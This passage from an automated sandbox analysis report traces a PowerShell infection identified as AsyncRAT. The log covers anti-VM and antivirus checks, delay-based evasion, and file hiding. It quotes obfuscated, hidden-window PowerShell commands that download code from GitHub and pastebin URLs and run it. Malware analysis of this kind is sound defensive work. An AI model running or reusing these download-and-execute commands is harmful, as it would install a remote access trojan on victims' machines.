              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep count: 4518 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4424Thread sleep time: -17524406870024063s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5116Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976Thread sleep count: 5229 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CheckForVMwareAndVirtualBox
              Source: powershell.exe, 00000001.00000002.1928170123.0000020AB28F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2130220731.0000027342840000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2817477632.000001E877C30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2228460086.00000188F77FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              .NET source code references suspicious native API functions
              Source: 1.2.powershell.exe.20a9bee0600.1.raw.unpack, MyUtilityClass.csReference to suspicious API methods: LoadLibrary(libraryName)
              Source: 1.2.powershell.exe.20a9bee0600.1.raw.unpack, MyUtilityClass.csReference to suspicious API methods: GetProcAddress(intPtr, procName)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, XLogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing) Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5818.tmp" "c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A1.tmp" "c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: powershell.exe, 0000000D.00000002.2813899704.000001E877A21000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2813899704.000001E8779D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2729093893.000001E85DA98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2817477632.000001E877CF9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2817477632.000001E877CE5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2729093893.000001E85DA90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2817477632.000001E877C30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2817477632.000001E877CBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
